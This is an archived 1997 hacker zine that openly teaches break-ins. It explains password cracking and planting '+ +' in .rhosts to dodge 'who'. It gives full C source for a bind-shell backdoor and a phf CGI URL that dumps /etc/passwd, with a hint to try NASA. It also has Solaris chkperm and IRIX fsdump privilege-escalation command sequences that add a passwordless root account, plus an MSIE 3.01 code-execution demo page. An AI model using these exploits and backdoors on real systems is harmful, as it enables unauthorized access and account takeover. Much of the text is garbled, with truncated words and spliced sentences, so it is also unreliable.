The Hacker's Encyclopedia 1998

home *** CD-ROM | disk | FTP | other *** search

/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / zines / a_m / cztj001.txt < prev next >

Wrap

Text File | 2003-06-11 | 83.8 KB | 1,813 lines

─────────────────────────────────────────────────────────────────────────────── ╒══════════════════════════════════════════════════════════════════╕ │ The CodeZero Technical Journal, March 1997, Issue 001 │▒ └──────────────────────────────────────────────────────────────────┘▒ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ BTW, I use EDIT.COM to view this from DOS, then the ASCII's work. ─────────────────────────────────────────────────────────────────────────────── In This Issue : ─────────────────────────────────────────────────────────────────────────────── 1. Basic Unix Skills...............................: Testu Khan 2. so1o.c..........................................: Pluvius / Captor / so1o 3. The Now Ancient pHf Teknique....................: Tetsu Khan 4. Solaris Chkperm Teknique........................: Tetsu Khan 5. Spanking New IRiX 5.3 Hax0r Code................: Tetsu Khan 6. MSIE 3.01 Bug...................................: Geoffrey Elliott 7. NSA Security Handbook...........................: Philip Pease 8. 911 Autodialer Script...........................: The CodeZero Crew 9. Common Ports List...............................: Testu Khan 10.Denial Of Service (DOS) Attack 001 : hddkill.c..: Tetsu Khan 11.CodeZero World News.............................: Mr.fr1day 12.News Conclusion.................................: Testu Khan ─────────────────────────────────────────────────────────────────────────────── 1. Basic Unix Skills : Testu Khan ─────────────────────────────────────────────────────────────────────────────── The Basics : ──────────── If you actually gain access and login to your system, you will see something like this... <systemname>:~:$ the $ sign implies you are a standard user, the ~ implies you are in your HOME directory, such as /home/so1o/. You could find out your user / group ID. codezero:~:$ id uid(533)tetsu gid(100)users codezero:~:$ or find out your working directory, using PWD (Print Working Directory) codezero:~:$ pwd /home/tetsu codezero:~:$ Common Commands : ───────────────── who - displays who is on the system. uname -a - displays the operating system. finger <login> - fingers a user. finger @<system> - fingers all users on a system. cat /etc/passwd - types you the password file. cat /etc/motd - t - changes your users password. whoami - displays your login name. cd <directory> - changes - changes to root directory. cd /usr/games - changes to the games directory. ps -a - lists ALL jobs running on system. ps -x - Lists ALL jobs YOU are running. kill -9 <pid> - Kill a job, using its PID echo "<text here" >> file.name - types test into files, eg... codezero:~:$ echo "i am eleet" >> eleet codezero:~:$ cat eleet i am eleet codezero:~:$ so you wrote "i am eleet" to the file called eleet, then typed it out using cat. The /etc/passwd Phile... ──────────────────────── if it is unshadowed, or the shadow suite is not installed, the passwd file will look like this... root:.et2UIAUFnn23:0:0:System Operator:/:/bin/bash bin:*:1:1:bin:/usr/bin:/bin/bash : : : james::533:100:James Smith:/home/james:/bin/csh tetsu:Hu.99rjpZzdf:534:100:Tetsu Khan:/home/tetsu:/bin/csh ^ ^ ^ ^ ^ ^ ^ | | | | | | | A B C D E F G A - login name, what is typed at the login prompt. B - ENCRYPTED password field, I will go into more detail later. C - user ID, a user id of 1, 2, 3, 4, 5, 6 is usually a super user. D - group ID, a group id of 1, 2, 3, 4, 5, 6, is usually super user. E - The name of the user in the "real world". F - The users home directory, where he starts off after login. G - The shell that the user uses. root has a password. bin has never logged in (bin:*:...). james has NO password, he just presses enter when asked for it. tetsu has a password. The Password Field : ──────────────────── This is encrypted, so how do we decrypt it to find the users login and password? The NSA developed the encrd the decryption key as to date, only the NSA know, so we find the users passwords by using a CRACKING program, such as crackerjack or john the ripper, these are available at many www sites : http://globalkos.org/ http://www.l0pht.com/ When you have crackerjac passwords have to be between 6 and 8 letters long, it is not very difficult to crack such password files, i have a dictionary file, that i wrote, he are some examples of common passwords.... qwerty secret password passwd abc123 123abc monday tuesday wednesday thursday friday saturday sunday So now you have a cracking program and a wordlist, or dictionary file, then you proceed to leave your computer to crack your freshly pulled /etc/passwd files, so you run the cracker and wait for some results. The common shells are : ─────────────────────── sh - a bourne (standard) shell. csh - a "c" shell (used in programming) tcsh - a turbo "c" shell (used in programming) bash - a "bourne again shell" - most popular, easy to use. ksh - the "korn shell" pdksh - the "public domain korn shell" Users on a system : ─────────────────── root - systems administrator, has the most priveleges, can do anything. bin - owns the system binaries (/bin/), most times this account is never used, so the password field is a * , this means that bin has never logged into the system. to find out the other users, just look at the /etc/passwd or /etc/group files, or use finger <user> , eg finger root Shadowed /etc/passwd files : ──────────────────────────── In systems with higher security, the /etc/passwd file may look like this... roetsu:x:534:100:Tetsu Khan:/home/tetsu:/bin/csh in this case, the encrypted password fields are replaced with x's and so they cannot be cracked, even if the user, like james, has no password, an x still is placed in the password field. various programs can be used to "unshadow" such password files, but I'll go into that another time. Hiding Yourself from WHO : ────────────────────────── codezero:/:$ cd (go to your home directory) codezero:~:$ pwd (are you in your home directory?) /home/so1o codezero:~:$ echo "+ +" >> .rhosts (place a "+ +" in the .rhosts file) there, the .rhosts file lets you do the following : 1) login using rsh and rlogin programs WITHOUT a password needed, so if the REAL user changes his/her password, you still have access. 2) login using rsh to hide yourself from WHO... you telnet back into the system... codezero:~:$ telnet localhost 23 Trying 192.203.180.5 ... Connected to codezero.com Escape character is '^]'. SunOS UNIX (lurch) login: tetsu Password: Last login: Mon Mar 10 13:27:27 from w00p.org SunOS Release 4.1 (KERNEL031895) #2: Sat Mar 18 08:20:29 EST 1995 WELCOME TO CODEZERO. codezero:~:$ who tetsu tty1 (w00p.org) tetsu tty2 (localhost) codezero:~:$ now, you have cleared your tracks quickly, as it says when the user logs in : Last login: Mon Mar 10 13:27:27 from w00p.org SunOS Release 4.1 (KERNEL031895) #2: Sat Mar 18 08:20:29 EST 1995 w00p.org is the last place I logged in FROM, if i was hacking this system, and the REAL user of this account was to see that, they would become very suspicious, and probably mail root@w00p.org So i telnet to localhost, so when the next user logs in through telnet, they see this... Last login: Mon Mar 10 14:27:27 from localhost SunOS Release 4.1 (KERNEL031895) #2: Sat Mar 18 08:20:29 EST 1995 And do not become suspicious, as root could have logged in as that user from localhost. Now it is safe for us to exit the system... codezero:~:$ exit Logout Connection Closed. codezero:~:$ exit Logout Connection Closed. I have now logged out of the system, next i can log into a different system, or my OWN linux system, and type this to log into codezero.com without a password, and I will be hidden too! darkstar:~:# rsh -l tetsu codezero.com csh -i No control on this terminal blah blah blah... codezero:~:$ who codezero:~:$ the WHO shows that no-one is logged onto the system...it has worked! codezero:~:$ whoami tetsu codezero:~:$ Now I can go through the system and hack it without being logged or seen, not even root or a super-user can see me! Where to get your accounts / systems to hack... ─────────────────────────────────────────────── I advise that you go into irc, then connect to EFnet, EFnet servers are... irc.nol.net irc.gate.net irc.primenet.com irc.cerf.net Then join #shells or #shell to trade your shells, i suggest you make a fake /etc/passwd file and trade it for a shell, or trade warez or porn, many traders will trade shells for stuff like that... General shells words : ────────────────────── EggBot - An EggBot is a program that is run on a hacked system, it runs even after you have logged off the system, examples of EggBots are as GuardBots in IRC channels, a program called TCL is often needed to make EggBots. Quota - If an account has NO quota, then the user can put as much on the hard drive as he or she wants, whereas systems like schools usually enforce about 5mb quotas, and so warez traders cannot store their programs there. Bandwidth - Modem Speeds Are : ISDN : Not really fast T1 : Around 10mb/second T3 : Around 40mb/second oc3 : VERY VERY VERY FAST The more bandwidth a system has, the faster information travels across it. Until Next Month, Happy Hacking... ─────────────────────────────────────────────────────────────────────────────── 2. So1o.c : Originally By Pluvius, Modified By Captor, Expect Lucifer.c s00n! ─────────────────────────────────────────────────────────────────────────────── /**********************************************************************/ /* THE CodeZero PRESENTS */ /* */ /* so1o.c - Simple Linux Back Door Program */ /**********************************************************************/ /* so1o.c opens a default port of 5010 on the system running it, then */ /* a user can exit and connect to target.com 5010 and then throw */ /* commands at the system, the only thing is that all commands must */ /* be preceeded with a ; sign, eg... who; ls -l; exit; and so on... */ /* a prompt has not yet been implemented, and users logged onto port */ /* 5010 do not appear on a WHO, so1o.c is verhas only been tested on linux 2.0.29 using... */ /* ---------> cc -o so1o -O so1o.c to compile it <---------- */ /**********************************************************************/ #define PORT 5010 #include <stdio.h> #include <signal.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid; struct sockaddr_in serv_addr; struct sockaddr_in client_addr; int main () { soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (soc_des == -1) exit(-1); bzero((char *) &serv_addr, sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr = htonl(INADDR_ANY); serv_addr.sin_port = htons(PORT); soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr)); if (soc_rc != 0 exit(0); setpgrp(); signal(SIGHUP, SIG_IGN); if (fork() != 0) exit(0); soc_rc = listen(soc_des, 5); if (soc_rc != 0) exit(0); while (1) { soc_len = sizeof(client_addr); soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len); if (soc_cli < 0) exit(0); cli_pid = getpid(); server_pid = fork(); if (server_pid != 0) { dup2(soc_cli,0); dup2(soc_cli,1); dup2(soc_cli,2); execl("/bin/sh","sh",(char *)0); close(soc_cli); exit(0); } close(soc_cli); } } ─────────────────────────────────────────────────────────────────────────────── 3. The Now Ancient pHf Teknique : Tetsu Khan ─────────────────────────────────────────────────────────────────────────────── Okay, pHf was first used in November 1996, by a group of hackers that hacked the FBI homepage, since then hackers have hacked many many many other pages including NASA and others. All you do is run netscape, or lynx, or whatever, then type this as the site address... http://site.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd replace site.com with your site address, try www.nasa.gov :) Thats it! you should get the /etc/passwd unless the bug has been patched. ─────────────────────────────────────────────────────────────────────────────── 4. The Solaris Chkperm Teknique : Tetsu Khan ─────────────────────────────────────────────────────────────────────────────── Type (or cut + paste) these commands whilst on a Unix System V or Solaris system, dont type the % signs % /bin/csh % mkdir /tmp/foo % mkdir /tmp/foo/lib % chmod -R 777 /tmp/foo % setenv VMSYS /tmp/foo % umask 0000 % ln -s /usr/bin/.rhosts /tmp/foo/lib/.facerc % /usr/vmshosts -rw-rw-rw- 2 bin bin 0 Nov 12 09:41 .rhosts % echo "+ +" >> /usr/bin/.rhosts % ls -l /usr/bin/.rhosts -rw-rw-rw- 2 bin bin 4 Nov 12 09:41 .rhosts % rsh -l bin localhost /bin/csh -i Warning: no access to tty; thus no job control in this shell... % id uid=2(bin) gid=2(bin) Now you have the .rhosts file from the unix tutorial in part 1 active, so you can use rsh -l bin system.com csh -i to login without a password OR being seen with WHO or being logged. bin isnt as good as root, but bin owns nearly all the programs on the system so you can have phun with those :) ─────────────────────────────────────────────────────────────────────────────── 5. Spanking New IRiX 5.3 Hax0r Code : Tetsu Khan ─────────────────────────────────────────────────────────────────────────────── Login to an IRiX 5.3 system, then do this... (dont type the % signs) % /var/rfindd/fsdump -L/etc/passwd -F/tmp/dump / (count to three, and hit ctrl-c) % ls -la /etc/passwd -rw-r--r-- 1 csh users 956 Feb 25 06:23 /etc/passwd And now I've got root access...so you can change the /etc/passwd using... % echo "rewt::0:0:mr.rewt:/:/bin/bash" >> /etc/passwd now you created a user called rewt, with no password, so... % exit then login to the system with rewt as login and hit enter for the password! ─────────────────────────────────────────────────────────────────────────────── 6. MSIE 3.01 Bug : Paul Greene / Geoffrey Elliott ─────────────────────────────────────────────────────────────────────────────── Proof that MicroSoft have no clue...Put this on a page and load up MSIE 3.01 and try it for yourself, modify it ARSET=us-ascii; NAME="iebug.html" Content-ID: <Pine.SUN.3.94.970303111313.25374D@dfw.dfw.net> Content-Description:  <HTML> <HEAD><TITLE>Internet Explorer Bug</TITLE></HEAD> <BODY BGCOLOR=BLACK VLINK=BLUE LINK=BLUE> <TABLE WIDTH=580><TR><TD> Cybersnot Industries Internet Explorer Bug <HR> Internet Explorer Bug 2/27/97 (Version 3.0 (4.70.1155)) Microsoft Internet Explorer v3.01 (and earlier?) has a serious bug which allows web page writers to use ".LNK" and ".URL" files to run programs on a remote computer. This bug is particularly damaging because it uses NO ActiveX, and works even when Internet Explorer is set to its highest security level. It was tested on Microsoft Internet Explorer Version 3.0 (4.70.1155) running Windows 95. This demo assumes that Windows is installed in "C:\WINDOWS". Windows 95 DOES NOT PROMPT BEFORE EXECUTING THESE FILES. ..URL files are WORSE than .LNK files because .URLs work in both Windows 95 and Windows NT 4.0 (.LNK's only work in Windows 95). .URL files present a possibly greater danger because they can be easily created by server side scripts to meet the specific settings of a user's system. We will provide .URL files for execution in the next day or so. The "shortcuts" can be set to be minimized during execution which means that users may not even be aware that a program has been started. Microsoft's implementation of shortcuts becomes a serious concern if a webpage can tell Internet Explorer to refresh to an executable. Or worse, client side scripts (Java, JavaScript, or VBScript) can use the Explorer object to transfer a BATCH file to the target machine and then META REFRESH to that BATCH file to execute the rogue command in that file. The following table outlines which areas and users each shortcut tBORDER=1> <TR> <TD>File Type</TD> <TD>Windows 95</TD> <TD>Windows NT</TD> <TD>Execute Apps</TD> <TD>Command Line Args Allowed</TD> <TD>Searches Path</TD> </TR> <TR> <TD>.LNK</TD> <TD>Yes</TD> <TD>No</TD> <TD>Yes</TD> <TD>Yes</TD> <TD>No</TD> </TR> <TR> <TD>.URL</TD> <TD>Yes</TD> <TD>Yes</TD> <TD>Yes</TD> <TD>No</TD> <TD>Yes</TD> </TR> </TABLE> Security Comparision .URL vs .LNK </CENTER> Naturally, the files must exist on the remote machine to be properly executed. But, Windows 95 comes with a variety of potentially damaging programs which can easily be executed. The following link will start the standard calculator which comes with Windows 95. <A HREF="calculator.lnk">Windows Calculator (.lnk)</A>. <A HREF="calcnt.url">Windows Calculator (.url)</A>. This bug can be used to wreak havoc on a remote user's machine. The following links will create and delete some directories. <A HREF="mkdir.lnk">Create a directory "C:\HAHAHA"</A>. <A HREF="explorer.lnk">Open "C:\HAHAHA"</A> <A HREF="rmdir.lnk">Remove the directory "C:\HAHAHA"</A> The META REFRESH tag can be used to execute multiple commands in sequence. <HR> Internet Explorer Bug Discovered By <A HREF="mailto:shoggothe@cybersnot.com">Paul Greene</A> Page and Examples by <A HREF="mailto:geo@cybersnot.com">Geoffrey Elliott</A> & <A HREF="mailto:bmorin@cybersnot.com">Brian Morin</A> </TD></TR></TABLE> </BODY> </HTML>  ─────────────────────────────────────────────────────────────────────────────── 7. The NSA Security Handbook : Philip Pease. ─────────────────────────────────────────────────────────────────────────────── Security Guidelines This handbook is designed to introdules and procedures with which all NSA employees must comply. It highlights some of your security responsibilities, and provides guidelines for answering questions you may be asked concerning your association with this Agency. Although you will be busy during the forthcoming weeks learning your job, meeting co-workers, and becoming accustomed to a new work environment, you are urged to become familiar with the security information contained in this handbook. Please note that a listing of telephone numbers is provided at the end of this handbook should you have any questions or concerns. Introduction In joining NSA you have been given an opportunity to participate in the activities of one of the most important intelligence organizations of the United States Government. At the same time, you have also assumed a trust which carries with it a most important individual responsibility--the safeguarding of sensitive information vital to the security of our nation. While it is impossible to estimate in actual dollars and cents the value of the work being conducted by this Agency, the information to which you will have access at NSA is without question critically important to the defense of the United States. Since this information may be useful only if it is kept secret, it requires a very special measure of protection. The specific nature of this protection is set forth in various Agency security regulations and directives. The total NSA Security Program, however, extends beyond these regulations. It is based upon the concept that security begins as a state of mind. The program is designed to develop an appreciation of the need to protect information vital to the national defense, and to foster the development of a level of awareness which will make security more than routine compliance with regulations. At times, security practices and procedures cause personal inconvenience. They take time and effort and on occasion may make it necessary for you to voluntarily forego some of your usual personal perogatives. But your compensation for the inconvenience is the knowledge that the work you are accomplishing at NSA, within a framework of sound security practices, contributes significantly to the defense and continued security of the United States of America. I extend to you my very best wishes as you enter upon your chosen career or assignment with NSA. Philip T. Pease Director of Security INITIAL SECURITY RESPONSIBILITIES Anonymity Perhaps one of the first security practices with which new NSA personnel should become acquainted is the practice of anonymity. In an open society such as ours, this practice is necessary because information which is generally available to the public is available also to hostile intelligence. Therefore, the Agency mission is best accomplished apart from public attention. Basically, anonymity means that NSA personnel are encouraged not to draw attention to themselves nor to their association with this Agency. NSA personnel are also cautioned neither to confirm nor deny any specific questions about NSA activities directed to them by individuals not affiliated with the Agency. The ramifications of the practice of anonymity are rather far reaching, and its success depends on the cooperation of all Agency personnel. Described below you will find some econcerning your employment and how you should cope with them. Beyond the situations cited, your judgement and discretion will become the deciding factors in how you respond to questions about your employment. Answering Questions About Your Employment Certainly, you may tell your family and friends that you are employed at or assigned to the National Security Agency. There is no valid reason to deny them this information. However, concerning specific aspects of the Agency's mission, activities, and organization. You should also ask them not to publicize your association with NSA. Should strangers or casual acquaintances question you about your place of employment, an appropriate reply would be that you work for the Department of Defense. If questioned further as to where you are employed within the Department of Defense, you may reply, "NSA." When you inform someone that you work for NSA (or the Department of Defense) you may expect that the next question will be, "What do you do?" It is a good idea to anticipate this question and to formulate an appropriate answer. Do not act mysteriously about your employment, as that would only succeed in drawing more attention to yourself. If you are employed as a secretary, engineer, computer scientist, or in a clerical, administrative, technical, or other capacity identifiable by a general title which in no way indicates how your talents are being applied to the mission of the Agency, it is suggested that you state this general title. If you are employed as a linguist, you may say that you are a linguist, if necessary. However, you should not indicate the specific language(s) with which you are involved. The use of service specialty titles which tend to suggest or reveal the nature of the Agency's mission or specific aspects of their work. These professional titles, such as cryptanalyst, signals collection officer, and intelligence research analyst, if given verbatim to an outsider, would likely generate further questions which may touch upon the classified aspects of your work. Therefore, in conversation with outsiders, it is suggested that such job titles be generalized. For example, you might indicate that you are a "research analyst." You may not, however, discuss the specific nature of your analytic work. Answering Questions About Your Agency Training During your career or assignment at NSA, there is a good chance that you will receive some type of job-related training. In many instances the nature of the training is not classified. However, in some situations the specialized training you receive will relate directly to sensitive Agency functions. In such cases, the nature of this training may not be discussed with persons outside of this Agency. If your training at the Agency includes language training, your explanation for the source of your linguistic knowledge should be that you obtained it while working for the Department of Defense. You Should not draw undue attention to your language abilities, and you may not discuss how you apply your language skill at the Agency. If you are considering part-time employment which requires the use of language or technical skills similar to those required for the performance of your NSA assigned duties, you must report (in advance) the anticipated part-time work through your Staff Security Officer (SSO) to the Office of Security's Clearance Division (M55). Verifel must provide information concerning their employment to credit institutions in connection with various types of applications for credit. In such situations you may state, if you are a civilian employee, that you are employed by NSA and indicate your pay grade or salary. Once again, generalize your job title. If any further information is desired by persons or firms with whom you may be dealing, instruct them to request such information by correspondence addressed to: Director of Civilian Personnel, National Security Agenc Military personnel should use their support group designator and address when indicating their current assignment. If you contemplate leaving NSA for employment elsewhere, pplication, or to participate in extensive employment interviews. In such circumstances, you should have your resume reviewed by the Classification Advisory Officer (CAO) assigned to your organization. Your CAO will ensure that any classified operational details of your duties have been excluded and will provide you with an unclassified job description. Should you leave the Agency before preparing such a resume, you may develop one and send it by registered mail to the NSA/CSS Information Policy Division (Q43) for review. Remember, your obligation to protect sensitive Agency information extends beyond your emploMedia >From time to time you may find that the agency is the topic of reports or articles appearing in public news media--newspapers, magazines, books, radio and TV. The NSA/CSS Information Policy Division (Q43) represents the Agency in matters involving the press and other media. This office serves at the Agency's official media center and is the Director's liaison office for public relations, both in the community and with other government agencies. The Information Policy Division must approve the release of all information for and about NSA, its mission, activities, and personnel. In order to protect the aspects of Agency operations, NSA personnel must refrain from either confirming or denying any information concerning the Agency or its activities which may appear in the public media. If you are asked about the activities of NSA, the best response is "no comment." You should the notify Q43 of the attempted inquiry. For the most part, public references to NSA are based upon educated guesses. The Agency does not normally make a practice of issuing public statements about its activities. GENERAL RESPONSIBILITIES Espionage And Terrorism During your security indoctrination and throughout your NSA career pionage and terrorist threat to the United States. Your vigilance is the best single defense in protecting NSA information, operations, facilities and people. Any information that comes to your attention that suggests to you the existence of, or potential for, espionage or terrorism against the U.S. or its allies must be promptly reported by you to the Office of Security. There should be no doubt in your mind about the reality of the threats. You are now affiliated with the most sensitive agency in government and are expected to exercise vigilance and common sense to protect NSA against these threats. Classification Originators of correspondence, communications, equipment, or documents within the Agency are responsible for ensuring that the proper classification, downgrading information and, when appropriate, proper caveat notations are assigned to such material. (This includes any handwritten notes which contain classified information). The three levels of classification are Confidential, Secret and Top Secret. The NSA Classification Manual should be used as guidance in determining proper classification. If after review of this document you need assistance, contact the Classification Advisory Officer (CAO) assigned to your organization, or the Information Policy Division (Q43). Need-To-Know Classified information is disseminated need-to-know" policy means that classified information will be disseminated only to those individuals who, in addition to possessing a proper clearance, have a requirement to know this information in order to perform their official duties (need-to-know). No person is entitled to classified information solely by virtue of office, position, rank, or security clearance. All NSA personnel have the responsibility to assert the "need-to-know" policy as part of their responsibility to protect sensitive information. Determination of "need-to-know" is a supervisory responsibility. This means that if there is any doubt is information or material marked "FOR OFFICIAL USE ONLY" (such as this handbook). This designation is used to identify that official information or material which, although unclassified, is exempt from the requirement for public disclosure of information concerning government activities and which, for a significant reason, should not be given general circulation. Each holder of "FOR OFFICAL USE ONLY" (FOUO) information or material is authorized to disclose such information or material to persons in other departments or agencies of the Executive and Judicial branches when it is determined that the information or material is required to carry our a government function. The recipient must be advised that the information or material is not to be disclosed to the general public. Material which bears the "FOR OFFICIAL USE ONLY" caveat does not come under the regulations governing the protection of classified information. The unauthorized disclosure of information marked "FOR OFFICIAL USE ONLY" does not constitute an unauthorized disclosure of classified defense information. However, Department of Defense and NSA regulations prohibit the unauthorized disclosure of information designated "FOR OFFICIAL USE ONLY." Appropriate administrative action will be taken to determine responsibility and to apply corrective and/or disciplinary measures in cases of unauthorized disclosure of information which bears the "FOR OFFICIAL USE ONLY" caveat. Reasonable care must be exercised in limiting the dissemination of "FOR OFFICIAL USE ONLY" information. While you may take this handbook home for further study, remember that is does contain "FOR OFFICIAL USE ONLY" information which should be protected. Prepublication Review All NSA personnel (employees, military assignees, and contractors) must submit for review any planned articles, books, speeches, resumes, or public statements that may contain classified, classifiable, NSA-derived, or unclassified protected information, e.g., information relating to the organization, mission, functions, or activities of NSA. Your obligation to protect this sensitive information is a lifetime one. Even when you resign, retire, or otherwise end your affiliation with NSA, you must submit this type of material for prepublication review. For additional details, contact the Information Poepublication review procedures. Personnel Security Responsibilities Perhaps you an recall your initial impression upon entering an NSA facility. Like most people, you prob safeguards--fences, concrete barriers, Security Protective Officers, identification badges, etc. While these measures provide a substantial degree of protection for the information housed within our buildings, they represent only a portion of the overall Agency security program. In fact, vast amounts of information leave our facilities daily in the minds of NSA personnel, and this is where our greatest vulnerability lies. Experience has indicated that because of the vital information we work with at NSA, Agency personnel may become potential targets for hostile intelligence efforts. Special safeguards are therefore necessary to protect our personnel. Accordingly, the Agency has an extensive personnel security program which establishes internal policies and guidelines governing employee conduct and activities. These policies cover a variety of topics, all of which are designed to protect both you and the sensitive information you will gain through your work at NSA. Association With Foreign Nationals As a member of the U.S. Intelligence Community and by virtue of your access to sensitive information, you are a potential target for hostile intelligence activities carried out by or on behalf of citizens of foreign countries. A policy concerning association with foreign nationals has been established by the Agency to minimize the likelihood that its personnel might become subject to undue influence or duress or targets of hostile activities through foreign relationships. As an NSA affiliate, you are prohibited from initiating or maintaining associations (regardless of the nature and degree) with citizens or officials of communist-controlled, or other countries which pose a significant threat to the security of the United States and its interests. A comprehensive list of these designated countries is available from your Staff Security Officer or the Security Awareness Division. Any contact with citizens of these countries, no matter how brief or seemingly innocuous, must be reported as soon as possible to your Staff Security Officer (SSO). (Individuals designated as Staff Security Officers are assigned to every organization; a listing of Staff Security Officers can be found at the back of this handbook). Additionally, close and continuing associations with any non-U.S. citizens which are characterized by ties of kinship, obligation, or affection are prohibited. A waiver to this policy may be granted only under the most exceptional circumstances when there is a truly compelling need for an individual's services or skills and the security risk is negligible. In particular, a waiver must be granted in advance of a marriage to or cohabitation with a foreign national in order to retain one's access to NSA information. Accordinglon-U.S. citizen must be reported immediately to your Staff Security Officer. If a waiver is granted, future reassignments both at headquarters and overseas may be affected. The marriage or intended marriage of an immediate family member (parents, siblings, children) to a foreign national must also be reported through your SSO to the Clearance Division (M55). Casual social associations with foreign nationals (other than those of the designated countries mentioned above) which arise from normal living and working arrangements in the community usually do not have to be reported. During the course of these casual social associations, you are encouraged to extend the usual social amenities. Do not act mysteriously or draw attention to yourself (and possibly to NSA) by displaying an unusually wary attitude. Naturally, your affiliation with the Agency and the nature of your work should not be discussed. Again, you should be careful not to allow these associations to become close and continuing to the extent that they are characterized by ties of kinship, obligation, or affection. If at any time you feel that a "casual" association is in any way suspicious, you should report this to your Staff Security Officer immediately. Whenever any doubt exists as to whether or not a situation should be reported or made a matter of record, you should decided in favor of reporting it. In this way, the situation can be evaluated on its own merits, and you can be advised as to your future course of action. Correspondence With Foreign Nationals NSA personnel are discouraged from initiating correspondence with individuals who are citizens of foreign countries. Correspondence with citizens of communist-controlled or other designated countries is prohibited. Casual social correspondence, including the "penpal" variety, with other foreign acquaintances is acceptable and need not be reported. If, however, this correspondence should escalate in its frequency or natur Security Officer to the Clearance Division (M55). Embassy Visits Since a significant percentage of all espionage activity is known to be conducted through foreign embassies, consulates, etc., Agency policy discourages visits to embassies, consulates or other official establishments of a foreign government. Each case, however, must be judged on the circumstances involved. Therefore, if you plan to visit a foreign embassy for any reason (even to obtain a visa), you must consult with, and obtain the prior approval of, your immediate supervisor and the Security Awareness Division (M56). Amateur Radio Activities Amateur radio (ham radio) activities are known to be exploited by hostile intelligence services to identify individuals with access to classified information; therefore, all licensed operators are expected to be familiar with NSA/CSS Regulation 100-1, "Operation of Amateur Radio Stations" (23 October 1986). The specific limitations on contacts with operators from communist and designated countries are of particular importance. If you are an amateur radio operator you should advise the Security Awareness Division (M56) of your amateur radio activities so that detailed guidance may be furnished to you. Unofficial Foreign Travel In order to further protect sensitive information from possible compromise resulting from terrorism, coercion, interrogation or capture of Agency personnel by hostile nations and/or terrorist groups, the Agency has established certain policies and procedures concerning unofficial foreign travel. All Agency personnel (civilian employees, military assignees, and contractors) who are planning unofficial foreign travel must have that travel approved by submitting a proposed itinerary to the Security Awareness Division (M56) at least 30 working days prior to their planned departure from the United States. Your itinerary should be submitted on Form K2579 (Unofficial Foreign Travel Request). This form provides space for noting the countries to be visited, mode of travel, and dates of departure and return. Your immediate supervisor must sign this form to indicate whether or not your proposed travel poses a risk to the sensitive information, activities, or projects of which you may have knowledge due to your current assignment. After your supervisor's assessment is made, this form should be forwarded to the Security Awareness Director (M56). Your itinerary will then be reviewed in light of thies to be visited, and a decision for approval or disapproval will be based on this assessment. The purpose of this policy is to limit the risk of travel to areas of the world where a threat may exist to you and to your knowledge of classified Agency activities. In this context, travel to communist-controlled and other hazardous activity areas is prohibited. A listing of these hazardous actie hazardous activity areas can be found in Annex A of NSA/CSS Regulation No. 30-31, "Security Requirements for Foreign Travel" (12 June 1987). From time to time, travel may also be prohibited to certain areas where the threat from hostile intelligence services, terrorism, criminal activity or insurgency poses an unacceptable risk to Agency employees and to the sensitive information they possess. Advance travel deposits made without prior agency approval of the proposed travel may result in financial losses by the employee should the travel be disapproved, so it is important to obtain approval prior to committing ich areas of the world currently pose a threat should be directed to the Security Awareness Division (M56). Unofficial foreign travel to Canada, the Bahamas, Bermuda, and Mexico does not require prior approval, however, this travel must still be reported using Form K2579. Travel to these areas may be reported after the fact. While you do not have to report your foreign travel once you have ended your affiliation with the Agency, you should be aware that the risk incurred in travelling to certain areas, from a personal safety and/or counterintelligence standpoint, remains high. The requirement to protect the classified information to which you have had access is a lifetime obligation. Membership In Organizations Within the United States there are numerous organizations with memberships ranging from a few to tens of thousands. While you may certainly participate in the activities of any reputable organization, membership in any international club or professional organization/activity with foreign members should be reported through your Staff Security Officer to the Clearance Division (M55). In most cases there are no security concerns or threats to our employees or affiliates. However, the Office of Security needs the opportunity to research the organi public activities of a conspicuously controversial nature because such activities could focus undesirable attention upon you and the Agency. NSA employees may, however, participate in bona fide public affairs such as local politics, so long as such activities do not violate the provisions of the statutes and regulations which govern the political activities of all federal employees. Additional information may be obtained from your Personnel Representative. Changes In Marital Status/Cohabitation/Names All personnel, either employed by or assigned to NSA, must advise the Office of Security of any changes in their marital status (either marriage or divorce), cohabitation arrangements, or legal name changes. Such changes should be reported by completing NSA Form G1982 (Report of Marriage/Marital Status Change/Name Change), and following the instructions printed on the form. Use And Abuse Of Drugs It is the policy of the National Security Agency to prevent and eliminate the improper use of drugs by Agency employees and other personnel associated with the Agency. The term "drugs" includes all controlled drugs or substances identified and listed in the Controlled Substances Act of 1970, as amended, which includes but is not limited to: narcotics, depressants, stimulants, cocaine, hallucinogens ad cannabis (marijuana, hashish, and hashish oil). The use of illegal drugs or the abuse of prescription drugs by persons employed by, assigned or detailed to the Agency may adversely affect the national security; may have a serious damaging effect on the safety and the safety of others; and may lead to criminal prosecution. Such use of drugs either within or outside Agency controlled facilities is prohibited. Physical Security Policies The physical security program at NSA provides protection for classified material and operations and ensures that only persons authorized access to the Agency's spaces and classified material are permitted such access. This program is concerned not only with the Agency's physical plant and facilities, but also with the internal and external procedures for safeguarding the Agency's classified material and activities. Therefore, physical security safeguards include Security Protective Officers, fences, concrete barriers, access control points, identification badges, safes, and the compartmentalization of physical spaces. While any one of these safeguards represents only a delay factor against attempts to gain unauthorized access to NSA spaces and material, the total combination of all these safeguards represents a formidable barrier against physical penetration of NSA. Working together with personnel security policies, they provide "security in depth." The phng procedures. The responsibility for carrying out many of these procedures rests with the individual. This means you, and every person employed by, assign, or detailed to the Agency, must assume the responsibility for protecting classified material. Included in ors in operational areas; determining "need-to-know;" limiting classified conversations to approved areas; following established locking and checking procedures; properly using the secure and non-secure telephone systems; correctly wrapping and packaging classified data for transmittal; and placing classified waste in burn bags. The NSA Badge Even before you enter an NSA facility, you have a constant reminder of security--the NSA badge. Every person who enters an NSA installation is required to wear an authorized badge. To enter most NSA facilities your badge must be inserted into an Access Control Terminal at a building entrance and you must enter your Personal Identification Number (PIN) on the terminal keyboard. In the 